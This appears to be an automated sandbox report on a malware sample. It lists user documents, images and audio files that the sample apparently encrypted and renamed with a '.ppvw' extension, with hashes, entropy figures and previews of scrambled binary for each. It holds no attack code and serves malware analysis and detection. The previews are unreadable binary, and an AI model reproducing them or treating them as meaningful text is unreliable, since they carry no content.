                                                                                                                          Preview:LTKMY...5.$.....FY?.].P ...&...E...|03.x.........Un..,..`..z....F..Q*.@.%X9\{a....t+._..c/K=..iK....o.Z..J.M...s....LJ.uT.i... ;.\.........P..c......RAX=.....f.ba....h.a.L.........uB.*O.^h>.NQ...ZK...h.>..m.N...o....T...A.|6zZ..C.._.......S.6.V .Oc.@....d$m...6....u.....K...b6..@.Glf.hKT.........Z>(j.#.B..{..]..m...J.-.a..#.,.].j.....1&w.V..pkT.$......R.r.I..n".g..F`.CP.Fx.....Qn.f\.9}{.$...v.q.e).kd...y..8(g.Z.~........].. ..s...|mB8......m...0z..4..Z....umoiHi.l.$..q.S..-..._......6a.l!6.;....A..DB..C........`...@9g....e....Y;b...8"e.Y...T[.@....0iF...a.0O..q..>...~...n.f...G.&....1.mh..z.i.!.}....a...)...*...h......_..r..6nK.9.._........@...[..?a."k....V...-_.2D%.........j..cni.$9......`x.......o.......J.i......`. MM,^/.j...[.1^.]..Q.*.Xm.B=~...~.H.O..>..&.GM.O....%.."...(.RY....`@.T.5'.....S.!.=....Gr..A..N[....yCct/ x........V. %.0............DS&...K..4.a.a..?..`]..O..t$..X...Y..`2*.j[7.......Q..45o.....;.....{~..D.k.q...U........

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\MVLAMAIDGQ.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.839838615056011
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:tLg8h5f53ZRYtIfnp7HjgDXIrDsk/+9F8KKfufxt0FAEf4cLfd/S8KHH0z4ORQXn:aALJRNpjvrDd/dQLdEfRLFrlzxiNUkD
                                                                                                                          MD5:7E4C3276CFBA23E992C0C7CB43FD13F3
                                                                                                                          SHA1:EA8BB86DF04D783D837CEDA15DB540B12F8230BA
                                                                                                                          SHA-256:E619454C3E5EE4792A646E95C09D0EFF347FF389015A06B90059C9C75FD8F248
                                                                                                                          SHA-512:38FD80AE78403515C305482DE6A59A2309159D8ABD2AC06ED44370AAF75B2258D6DEDFC5AEB619D78A108E790B6C17345D3CB90EBC35B101879494256E578ACC
                                                                                                                          Malicious:false
                                                                                                                          Preview:MVLAM...0...W..["..v..n..fb&x1.Q2..c...(+9.WRM=...atx...1..>.^.+.p|!5...`b....E.9.63N?..ya.YK........H.P.q..@vZ..q......LGX..y.=Y...%~......bp...N.0......4..u..QoOR...0...G.(..g... ..C.}"....!.Rlp,.0.\O.......#.Ac,/$J.x.^Zj.....z.r.......fa[..U..~`.z..l..t.........~..*.`1~Z.H..z..=.I.@y&........>..)?YxVT...X0_|..\.(.0."...o..........;.6....l8)..........R.../.L...QN...UEJ.5t.$...y3..B......EZ,=Y.{.,.6.....X.'...c......i.K..{....p1...={..o....C..r:A.JB...9...O......WMhQe...0#.\..MQ.MgV&gq...\.$.......w...f...be...E...1.R...U.?...8.MT...aV.8D.?...<c...8.......}s.....V<yp..RLK.......&..Rxw7k....H..7.(.X>..o..+.'..l....P.^dA....NB.............P....R.t8...L}.vXk........)LEw..!....l-...e.BN.D..N...B..tGqtX.....'....I....g.....K..2..sd....@T^a\9.MI.X.%%Y.,... 2.}].j&d......u/{.J....h...u.t..........`.....j...(.......4.p..D..~.A.FG^.L...X..Re@...W`.k~z|j....J.X7..!mw.*.rX....t.00\Q.j.lM..W...B...XV\.u1.b.X.y.N#)...T.....)..=..._....g.]T......?....

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\NIKHQAIQAU.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8567417291450035
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ia0+6AQ+0MzPBThhEgceuMHz53dbvYvFmT3MjfXVzBfQiN6d7bD:j07tO1X5HtVymgbt+/D
                                                                                                                          MD5:97D0B8BC4047D0D9105C5F37F33281FC
                                                                                                                          SHA1:D5574257E08E7AA03D33D643782A22E034516227
                                                                                                                          SHA-256:FDF7412DF2AFE60204FC40E9980B4364F23AD99E805392BB7BD492DE23EF55C1
                                                                                                                          SHA-512:B9272F74FDE078979F2E1279929BB66FDAB91337ACA7A1E8AA6731DEC8007362D821CF79AB51A27767EF7E72057873B07E356DBEE747826CE2F2B1DB256C1F59
                                                                                                                          Malicious:false
                                                                                                                          Preview:NIKHQ...9.Zs.D....l|y.5:.](..L.V....E...uTQ.....$N.H.Yi.. '.....bW.uw......J...n..|0.-{P~aj.....9.uri3+...[.1..S.,..C]!3....0_.`......J...I....^..SY.......p=. ..C[.#>.S..~ ~..;........D......'.=%.H.[.M..Cz2..cP.eU..$a6.$.S.v..Ez....YR....L&Z1..1...&hn........ .r..F..3k..r....2s+.Q)...Dt..`c.z..3&a.%f...#>...F..AW..4j.......p.|5..mAk..Fj..},..fB......u..}.Z.q...*j.C9_.'.FT....^d..w.X..y.@.1....:..6.\..7..m#;j.q..J.L.@.........K&Q....Mpk$.(.;Vh..A.2...).....^..V.".4.l..I.M.a..&..X....,?...9.........u}pn?.L.r..k.8P...&l.......D}s.....V.7..N.}_./.r.B6aV...f.vq&...X.+d$...W...u~...........}e..u>....'...h.-75|...U.....C.....Sc...F..\..,%z' .....Z.#..@.=4.....=...o...Y...Q._z.........!.W4...|.uI..6. ..C....*.W...;..T.VdZ...... s2....gxDi{B.Za....`=..C...N........Q._...y5u.N\.C.6L.;..Q"..w..!.....H..0n...d..j.D).e.W#NZl..).;..X.Y:3.\.........D......q..i..Vb"...:.+. .....C.}21*.Q.I..L..L..T.>B...SM..@..Z.n.........k....s.-.C.4W.\.Mg..&j..Z..

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\NWTVCDUMOB.docx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.842203580111211
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:mIvV3FXncxRpeHnzECZ/AZpB3EQtypyyP4fr7TKAUdbbD:mSxJTRATB3EQwUo4jPU1D
                                                                                                                          MD5:15B8998D8944780F8277696FF094DEA0
                                                                                                                          SHA1:A6134FC7980F0CDAD25894FC392AB1758C9CBBC9
                                                                                                                          SHA-256:24FDD04202E7D628DB8392566882E6C72F4C0A1291DAA3BE39D5A10E2B5C3465
                                                                                                                          SHA-512:57E9D308409630556FD58C49B33D01925A179D8866B1F362C1F4D11E63840D463D41764E29FCB7A4C876FD7976DB92979347EC7CBEF05582A975E84BE65EE563
                                                                                                                          Malicious:false
                                                                                                                          Preview:NWTVC..........R..[...D7.).u.........B.....$.........G....k.}....4x.l...O3.$.b....}9........<(p.E..+q..wry..(...s....V..zE..u.....0B...qV..6P.....HC..F)2...5..[.EX.....R...1.s..r*.U......o]7".GAs...;..i.a.1ct..j.:...3..zl.g6Unj) ..U...e.....,.$.W"...$1....C..xh..K)..../a..L.^:y.........;...J9.*]...5g.++.!.UDR7..b.BC..K...*z...`6q....4...H/.,.Z.........]#..$.R..,....../uD4;../.`.....*.]..11.[....D[.B/ 1\.*.c.^.o..A.q,."$3..c.f{X.......zY..U..%q6.U.*....u...F...Y..horM.(.{..Vbph.(..&D{#D...+...S.......%.60......&.;.R.Y...d..GAf..+.|.h.8/.6....A...y....T...R.SOi|....d.G.....w..`.......'g8.y.......p..G3.5F...j.I2xN......@.nT...a..k..i...b..(d.Y.t_.q..Y. ...J.......>....S..\e4O.m....=......`t,....N.L...s(o..W.R...2..F.-.f.u.8.....6Fq.^*.^r.qtk.H....@Cr..|..E.......y.3...g.l..m3..U...T..rNG...T......u`Y.3.k.ua.:~_.[.>.4.R.......EK.$: o.9..7.pyrM.<R.....~=.%..u..:...w.z..TD.P".U...k).7c1...s..T.&..K ..'x..c........(....4c...i.....m^..F..4.....

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\NWTVCDUMOB.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.858644395249906
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:jGwaf2oyIZw3YD57vwCilDaDDqAxUHsF14r5mueLyBgYbtDl4Y4HpMHJL9mTB+6u:y9y8D57vwCioDC24r57eLmCYeMHxYg5f
                                                                                                                          MD5:72D08E8DA7A6423AFDCD351B6D564C5B
                                                                                                                          SHA1:0F404AF39DE830EA60A0D250BA3DB77F6826F908
                                                                                                                          SHA-256:F05F3EDB6E9B938B2A9FA812941347B08914D588F37CC48AEC4BDEBBB55B1F82
                                                                                                                          SHA-512:44EE6A32C43889C925A3E431211B8AA20B5CF58802A2030DE552D8BB021D24CB0846F143E3A4FDA3042CC6823B294628912661FA51B8407E921B3175C3A26790
                                                                                                                          Malicious:false
                                                                                                                          Preview:NWTVCM..Ket..'.,#...T.{C`.m.@]..*...lzj.r_...-.......t..Z4.l.t..'/u.la..dr.......e$......v6w.Wy.tM....a.......E.9.X..K....<...$........8..#Zp{.C.c..p...2...iR1cQ+H.{.7Z...7...[....b....Y..S.7l(.Jv.....&j.y5'o2l.7r.....Z.qO.z0........G.R.a...g..:|.(..7.j...@.0.$.X.........d....qt.'.....*....(.O.mC...&..YZ.4...c.B..c..'.h~.o.D....U...s..+..bm..*n..(.6..%,..,>M..M.4._#.!..r..=..|cR......P9.....N....B...z...7.Z. (.....Xf|..|:y.....S... l...1.I.X........H].+....a..Ly+.. .c...kR.N.xg/...$dw..?.U.H...y...T.7..5.;..+A..9v.....?.-OH......`Caz..0...5;...^y.# ...........ri........P.6..4..}.w.3........^...s......6._...Tw0....r..E......u.i...e...ri....Bn\7..k_e;7....B.\V.!.J....D.K....LW..q.+8...y...cH.7.bj\!.k..!.@..{bT...#.j....;.ps.?.C..z...>.v.....G...jm[U.....J..t....AC... .>%.yX.K. N.#.<$.{..?...=}.7K6...7;.{A(#.;i......W.].<.M...b.C.....U&4..6.q....."a.b.B........+.|......Zm1.7.I...w..%.b>...I._.&..e.h."...d9x...i.z..O..c.S..~....s>.>2...

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\ONBQCLYSPU.docx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.873474589347564
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:3vqWx/vXdkks8whtKZ2YMNipfy+811WpkUrXRXnZS1Lq58HoNkOD+fsbD:/qWxXdkku9YMc1yQpdzVmS+SkOD+uD
                                                                                                                          MD5:7CAA297B394BFEF0C4778ECC246BEEC7
                                                                                                                          SHA1:C1905FC1DC4E8154A9809B157929985D0AD43D49
                                                                                                                          SHA-256:45DDE0C4391F04C49E6E5340535AA07551E367E0A144545897DD1D6659293943
                                                                                                                          SHA-512:80061DA9F831AA0F961B6FC72D31E30D54119CD8A78508ED11B83ECC0A5FCF400CF691F78E4F59B4654F3C20E1C3AB29F8D70F9AB706A921737EAD64C0C15C54
                                                                                                                          Malicious:false
                                                                                                                          Preview:ONBQC.UGS....oC.h......_.g...#.n...B..q.#..... ..J...p..."1^z.9.YF.....M..o..,4hW.^.Pl...X..;..%.mY...M...N...i...F|.t...... .\I...M...|.....x9\......].....C.....y77...s.(0.b...{e..20......v..........H;..........c6W.M..;....z...t..\.y. .`...C..|..mx.>d..L.Q..j5TT..(...F..QgN.\4.S...{T......n....DU.+.....*..~...X-p.F.`2.......S.X.Xp3.^l.Z.....S......7I..E.Y...G.>..eN..p..JJ.cw..8..9..M..WyI...u.............qNo4CgSn..L.94....."..^=..x....&.v.8.u+....U.;.$..J.+...734.....*~Sp.V..Uq.3{.q.H..>..w...C.ge.@#....R..jr{.DJ.v..w.l...x..Z{....%._.<~ tAR.>3..6c.7..D..go...<z..T.......).......6>:..Z./,..:/......L.N'.PH.8.h.d..[.:.f...yQ*L...{.kd)..7]U..@\o..py.~.w-oP...#A.=:.K).pt.T).RQt.@..6.'.P...............S.*....,..9.@....o....%."..+....w....qi(`..P.L..\v.C.q>..b.P.......Gs...f...L\....3..$......=.."T....Wg....Q.g..B+..w .o}.).(7.0.(q".......x..b..1..c.<..G4L..m..>..np0Jt%..~....5C.f..Q.o.qu#....as.%V...:?.......]..,..I...HmO..S.n.E...

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\ONBQCLYSPU.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.861083318791211
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:xNjDGeOZuVizA9rduKoMd3S5KwzT5g1eRajq84IvMAbycSF8qvY4zuXDhG4quvfo:fvlOZuIA9RuMd3Gnf0yEv/AF8qvY/XDA
                                                                                                                          MD5:FDA62E903D7D2088DD5C33509430C54C
                                                                                                                          SHA1:B23E30D45F8144113E4DF9AAE17471EC5F132375
                                                                                                                          SHA-256:DBE7F0CB3A7D7508EB07822FF6B28EECEC9A9DE1F09B40A0AE5DF44EDC7B780D
                                                                                                                          SHA-512:4A263405540A90AB4E76AFFD77B4461B3E71870BA83F30B382ED864ACDB3D5DFA430C27E6D05DA9D7FD8F2FC898D8C49A9F8E5CD4D2CF1C3FDD2E938773ABF59
                                                                                                                          Malicious:false
                                                                                                                          Preview:ONBQC.b%F..,..y...@..0.-.{M.....m.k.i...]....x1.....|...8h5T.7. mIOHe}..k.z.....o..2,..,.....|Z.-T/..z..kQm.o.jlh.....c.3Frg,.~.H.e..E.qQ.QS.=B.Gx....).VJ.FV..........b....J.%....A.....G.Lp...O`.M.....p...`...F A....W......qs.DJ-.....%......]5.s..sm....0...+B........u...q....p.^..{a&.8..J...L...g.W.G.V}..TG.....#..2.C..K.......x..i......8..1.jG....l..O...J.t..P..#...-s2iTkO...B.oY...o.R.".&..@..:....(..i.X(....'....3......Q$..r...<?.....q.^.`C.3...Z..G.n\.R..>6...).....`..U......#9...iB.N.cg...FDo...>e.B...C..1.s..g...n.5...@..}a.....y. l.D.d...u.g..}.8p.'o.'..O.......r..%.......6...f.I*.,*. d+...=Y..)x.....hxv..;.8.g.....6..@n...Hi7B.._V...!.P.g a.C].a"w.0 ..Dr..}.R.hE/..n....d....."3Gk......*u....[....z..r...........P...W8....~ux.....t.zHZ.09A..}.&...G.o......G.S.~.(...C<D....5..2....L.h,...qf...`...,...m}*.,NO.._rL+QE.. ..U..A&a..tp.J.YH.v~..>{...m.....:.8..B7.z4.Ec......)......N.....,.>..J..f.C....G.q#k.Il..".Q...9.t

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\PIVFAGEAAV.docx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.842723804546775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:jXYuEFD+BVBpUpmTKpAc8TY1nO7KzUkwOTCp7AFoYBZpZYbD:spFDABImhcL1uKzTrTCpIYD
                                                                                                                          MD5:11BBDBEE05A68A8BF5E40CA4A87310AD
                                                                                                                          SHA1:4876072CC3E4E35B98C854507F1D89D69C76EA28
                                                                                                                          SHA-256:64A8761CFEEC38FF20B4777A822F53A59098BEF31D2A25FAE8B4E9E9DA6A4157
                                                                                                                          SHA-512:729B9BF89AFFFCDE7E1CB63AD2BFBD3A9D22E29AF7634887AC880011E8B6AB73D503D09E424F2DE560FD9CDBD56092A759DA0B48B0DE1CE6CC7AE13133E52791
                                                                                                                          Malicious:false
                                                                                                                          Preview:PIVFA/q#.}1....J....3...,....../..(.....K....r6...V....J...o.l......7Sn9..E+...g3......b.5...p@j.6Pa..SH|.z.25Hn..V&Jt..it7 .^..........-.....%...nI+.jG.1.....a.n.......k....W;h......9hR..b..I#..v.7...R.1.....F.`h.._u].....@x..u.y......%...].\.p.u3.a.O......D.1b-.Iv..7...4^.'._...y.Tg....[.s...A....,2.z},.jz....bp.b.l..*4pIXFQ,...`T..ZQ\,tF....4?...0...^l.\..-O&M3.......F^....M....z.m.$..4...9..q...za~%....Y4N.p..\.&...._(.g../..7a.mpJ|#.....G.e`d...w@.^|.N_..\...iRgn...Xu,.ZG..X..x.+..0.KyT...3W+...!...g%..I..J..6,i\.O..N;......E*B......n..`.9I.;.n..E....+O...a... ,T..k......y.B...c..`H..^....\...tFGO..[...M..'.xtg.6+_...Y.c2H.....+...............zI...l....hFI.XS......5&.~.J..4.....IO.b.:E.....9.+1.z1>..0...[\3....<.;..8;WBq.~..'..lcVWq../..2...Y....w....]......u....u:!."a.,.....K3.aAU;..^...L.s.A\...|...T.l......hw.P..=Im....e...nj.....G.|.......IZY.s.."%>T.........."e5..r..T.....m[...fSp[...i....F.....B.X. =..<V.S...S.xrJ.g.0..7.(+

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\PIVFAGEAAV.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.856100572604738
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:l/hZcEsbehIMzI5o5J3H4+iQQDNrYgmMPRM4td3DMFKWjjr4JJKMsbD:l/hZcdiGII+JorY4Rrtd3DMtjjr4JJr+
                                                                                                                          MD5:58F81380D34B78091BA2646EC1D42F15
                                                                                                                          SHA1:ECC1BACD797B735B6B28E627AAC7B1EE8FFD15FF
                                                                                                                          SHA-256:57A1F9213E5F20AD31450BED7027863EC0D4A7FC9BB8CC15F643238135B6B9D7
                                                                                                                          SHA-512:D12E15A58462CF425408560C97A77C91DD3B49D4BA38DF04FB6097EB58F65DE14061FA4BA6C96B38C066F67DFFC9FCD4258A2AB0FA09779B6BBC6AB78ACC5D20
                                                                                                                          Malicious:false
                                                                                                                          Preview:PIVFA...{.....%.Cf....}.E.R..v.....C{.om..."...&/z...8....w~....A...:kg....*d....g.....{..\I.&..Kk.i.+......3.!....H#<.>.+>.y...dtPDm.b.g........C*.........7...u...:Z.P."'B=I*.....i....C?.4.Z....~...)..XS..E.P.....>.../[&V.8....~|3.fF.p....&D4..?.......e.K.2..c.....3.JD.l....\g.........i..c(.{..J.X.x..B.QJZ.k]N.(. P...QY^....L#P.t......../....h.MDV.R.)..0...k$_.J..../3.D*.....h....e..|A.Y...Xi..V6A..?.Q........f...1...........c].~..A.D.7.Sh./..q.f..2/.S..-o.[.o{l...01._V....Yd..[..b.....`.?..inW.m/.x..;8...|...o............. .!........F.k&..W.~......).aw9?....&R........a..]..............[...1.[\,...k.!BB....d...BL.Z.....G..J.)...N..O.~.}....T.....o..(...........:..f..X.e..MP.Z.....I......m.>.......n..\.0.Z..........I...../.._.".....}..A.x....}..'.....z...A...%.....V..=0...q4.....J#-.."....yS.....\#J..)D...R)`.V..I.y....6....n.@..g.q...TG.n..].......!.....6..:.....!.^k...S.....L....Z&..d.r.."Y......0;..f.5..7...".7...)/zA..

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\PIVFAGEAAV.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.845394653863646
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:4eVLFxvKwc/NXjrEDLsxswvD21Pz+YaG4nZ+hieETHBVE6bD:FxvKJ/NXjrEna2t+YckcRTHo4D
                                                                                                                          MD5:73B8B1CE3EF597E08AFFE5790CE34142
                                                                                                                          SHA1:3F7BD9F59BAC46D56C2EFF86935B218787F5BBFE
                                                                                                                          SHA-256:D6123AF4A2153B3E64A77EA7B082222A17B8770A76F1D1180856825F86969C04
                                                                                                                          SHA-512:C58D9DDBCF941B4C4DEF7AF4BF931FA0E72C0158887AAD6FA952A86C0F7C10CE9ADDDD0B8285860458A0F8EED0F42C2740A1594AFC1EB93CDD1B3D355B2AB62E
                                                                                                                          Malicious:false
                                                                                                                          Preview:PIVFA.....8...E0...(....z...OO.[f......5.K.......(...Ht{q.o.8...#....z..$...rvDS .p..)...m....5.?fr.M...($F..]'..'..24.l.<....a/v.d<@..`.4.t{H..Y.....yp.ygwf.......Nkg.vD.T...N..,.'..D........=....9..,.Wb..B.s..'.5.".L..m...Z'15ET.h.%7.. a..msA..-rB........u:...U...De..QSe....k...0Pr.Z..;.T.+..aL.m.XAr...........0.......H..zM..m%..d.9.....{.sU..h..<.N.(..-..4...1.!..y..g&2.X|c.Lb'...o{..I@.#..(.F...S...7.. .G_BE...g......S.$.4.Z.2.D..&..Hz....tZ.I^A#ny..i...^."ZS..l.t......-..M..........I....]}....<.d..u.D.$U.F.N.....3s.&.J.N..H..b.l".....q^.d...BU....?4X...z...kK.m/....Lv ....$.w.(A...vD....p...\..X$2...g.=a....e.h.W('...q..A.LQ.v....J....a....I...o~o.{..HJf....."..;.m.fjv&4c...sX.{.......^.b..U2....-<)e.y...=&.4...7....yu".%>N..J..@......va..B1..#,Yo...~..LZ....>...1h.3ree.S...|........a}~..4K9...z...t.....,...'."y...,....E$5.......5x................v.....87M.*.Rk...0]..Jn.......1n........_E..I>..Rhs.3 .c............(k...\..l....l`cGS...NF.....D..

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\QCOILOQIKC.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.818301734245135
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:QCUiQq40v6kSw/YfNNIEN8WS/NyEdU2Dv2l+x+ObD:QCBS13Iy8PNyEdU2c+x+sD
                                                                                                                          MD5:F2094078BB780EAD363A1DC56FB636B5
                                                                                                                          SHA1:5DE505F00BEF3529F656D3AD75880E018EE0F210
                                                                                                                          SHA-256:1C244B1B6743B4D799BBF442D231B8240747732E9A84AB4763C547C1D390A7EF
                                                                                                                          SHA-512:7361F15DC12EA23F917D60CDE24D5EAA98D9678C19CC0B8CC4DF150140AF6308A1A79ADECC47101C2D4F39226225DDF38E3C7994874A2E9A4E517652D1729EF6
                                                                                                                          Malicious:false
                                                                                                                          Preview:QCOIL.=*s"-.....!=.-r........@z.r..6.._R.."XG.'.....[..(./......-. .p......s7{.nN.+..bt...MJ..4...r:{]....4....Qa..3g..}.........&4:.........../...x.5.=.&..9.O}.J..&.........1....Z.....#....L. .P:wQX.R.......A5Q"J..v.|..M....,.c....C.O.....}9Ln...R7e.._.y5..8u...S.r.O..t.r0...F.2..E<>W...3.ovo..u.....P%A.wb....b..l:.&.%.=...0oi.:.e`...a.>.bN...<...,K=....,.PEwp.Q.AX............j.S..k.a......4..x....}..^I...Q.c1K,b.8.^.v../..{.t..a.T.......9%..._4.7...u.,.T.I..$.U..b:<......l..c.LE.Q..p...-.i...Z...3......&.F.g.'\.b&=8.T..U"...r3C..]V.:..Z"6.I...D...........Ve.>K....~.D.ZUp=..p.U.x.VA.a..P...K.<n..pv...Vq....2M...K.f[.$H.%..{...<Z.=&.A.....Mf.K.H6a.Ar7.Xe..:..|r.3.Z+..JR.)$.no..<.2.#.s..,.r....X.7..4......c3.}(Y.......q......\.3.....(.X4..H...G .y.....m...v.X.......@!a.y~S..I9.........M......."..4..,.#....8....g..8HFS?.t....El.`.t.)dQ.....V..E^.7..I......._....y.u....P^.7O.........u...V..=.M..o..X.#.u\q..}/S..9....[cZ{MC'........BU...h....-..p......

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\QCOILOQIKC.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.874235139494236
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Xmhz7hY2vPNrc7/qN9cxFz4TPWgMzqm1KNGbD:Xmhz/xc7iN6FUTPzMemfD
                                                                                                                          MD5:DD62A453E557FE66A50032B84560BB07
                                                                                                                          SHA1:2B402C2E58EBB7AB73FCB66657A7199200B2749C
                                                                                                                          SHA-256:75B7B01E33864C9AECC4E41EC2A9367E14ACB286F6FB37DA0F9E27D0ED46A745
                                                                                                                          SHA-512:4C02E0E64FF0B151423D8FA77B5D83136E11C9F99D48770EB4DDC6AD38E18D4988AEA18A9D0A1EF189342577DD3F0EC29DB4B60AF30779D29BDF31423CD35BE4
                                                                                                                          Malicious:false
                                                                                                                          Preview:QCOIL0...E#.....~..YN..k...q;'...(:1........ ...].q..F..G(.x~.\4./(...P..:...,].....V.CA.m..c...<.W.{.fo....B+..6....._B5..<....A........R.k...].h.....)J1.+.7... ....V.6..8 ..5.?.kK.Y.8...O...pso..'iJ.t..*..S....p.m...dG\Z.lW....'H.X^.`...z....1n=...,y...D....3).....!...3H..a.p\o`..E*;.g..=3....I<.....k.....(..z.[s..+/..4..>..a.W.#.GGk|.Oa.c..sY?.;F..w..w.......B^..*...l...9.}....$..g....{48=Z.V`..YR83...K..I..+....9.*.z.:\.y.n...C.eHf!..hR..-.p.P...$_..2..H.....rn.~.yRw....3s._HC.....Z......D...1 h...V.ZD..l....l!.TD.l....2..6..}.b...X.:%.......(JG..p.tk.......[../nU|......n.LI<.."u.C.(...7...}...I...HM.U..:..m.j...jA2|.)5..6~g.........3:...sc4.O..1..\"o..D...E.r...2..-Z\/z...{....[.b....T.....N........,....xK...T.Q....<.....q..e.{........!ri.#....w..N...o.h.Hf.F.:lu......`D....D....{..&.s...O.w.uTb.BE.....z..f.=...{h..}).bA.~....:..t.0...l.{..~f.#.C;...:.C._...J......f....&F..wL:*...z@.}.....w3...]p.|.eWA.....6...7?P.._.m.'..3.d

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\QCOILOQIKC.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.83968472722018
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:gmDKF/HIkTiytuWtAm8pAgpyxZXulhz015ZcnqgjRAjm7YJEGlwbD:gP/HIii6rAbfMg2Z+q2RAGYE7D
                                                                                                                          MD5:C52DE7915E5110461132BB21558B6FCB
                                                                                                                          SHA1:0D163E6F0DFF4ED37167AFBEB88B67A57C6E64A0
                                                                                                                          SHA-256:05CC9025193644877A58D8DCB9FE7033FFF919AB64398A6F95B83F73F0C91E6F
                                                                                                                          SHA-512:12975B6D90070035B41884C8651DF1E9DEBE2C19EF3D9D19BDE2C948969DEA45212B29C86845ABEA52BE3FF70BFB413F96B3509CC276E8AE0E252DD6697204BB
                                                                                                                          Malicious:false
